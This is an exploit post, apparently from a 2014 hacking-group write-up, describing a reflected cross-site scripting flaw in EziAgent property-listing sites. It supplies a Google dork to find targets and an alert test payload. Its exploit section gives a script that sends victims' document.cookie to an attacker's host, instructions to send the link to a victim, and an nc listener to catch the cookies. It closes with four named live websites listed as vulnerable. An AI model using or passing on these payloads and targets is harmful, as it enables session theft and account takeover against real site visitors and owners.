facebook facebook twitter rss

XSS vulnerability EziAgent include Jave Script

Author: Secret HaCk Sudan , Published: 24-07-2014
##############################################
#
# Title : XSS vulnerability EziAgent include Jave Script
#
##############################################
# Date : 24 / 7 / 2014
# Author : Secret HaCk Sudan
# Contact : fb/secret.hack.9
# tested on : linux Kali
##############################################
#
# Dork : --
#
# intext:"Powered by EziAgent" inurl:sid=
#
##############################################
# Explain :
# Copy and paste the dork in google.com ,
# inter any site and delete all words after sid=
# paste this code after sid=
#
# "><SCrIpT>alert("DamaneDz,n4ss1m ,UzunDz ,Gastro-Dz, Jigsaw")<%2FScRiPt>
#
# press inter
# now the alert must be shown
################################################
#
# Exploit :
#
# to steal cookies :
# first paste this code after sid=
#
# <script>new Image().src="http://XXXXX/secrethack.php"+document.cookie;</script>
#
# change XXXXX with your ip and send the link to victem
#
# and open your terminal And type this command
#
# nc -vv -l -p 80
#
# this command will listen to port 80 ( web port , Http port)
#
# root@SecretHack: ~ # nc -vv -l -p 80
# listening on 80 ...
#
# now this terminal is waiting for victem click
#
# after click to cookies will shown in the reminal in hash form
#
# crack it or use tamper data to bypass it
#
####################################################
# vulnerable sites for test : ---
#
# http://www.hitophomes.com/aprg/list/mypropdet.aspx?sid=
# http://homelifelandmark.ca/aprg/vcode.aspx?v=
# http://www.jdlrealty.ca/aprg/publicinfo/publicinfodetail.aspx?sid=
# http://www.marcosplopper.com/aprg/blog/category.aspx?sid=
#
####################################################
#
# Greets for : Sudan HaCking Group , Mr V , Maaroufi Mehdi ,
# zeus , Moalra , Tom Jons , Azzam Ezzat , Cutthroat Sudanese
# shaja orgnaization , Attacker SD , SD attacker , Top Secret
# and All my Friends ^_^
#
####################################################

Like us on Facebook :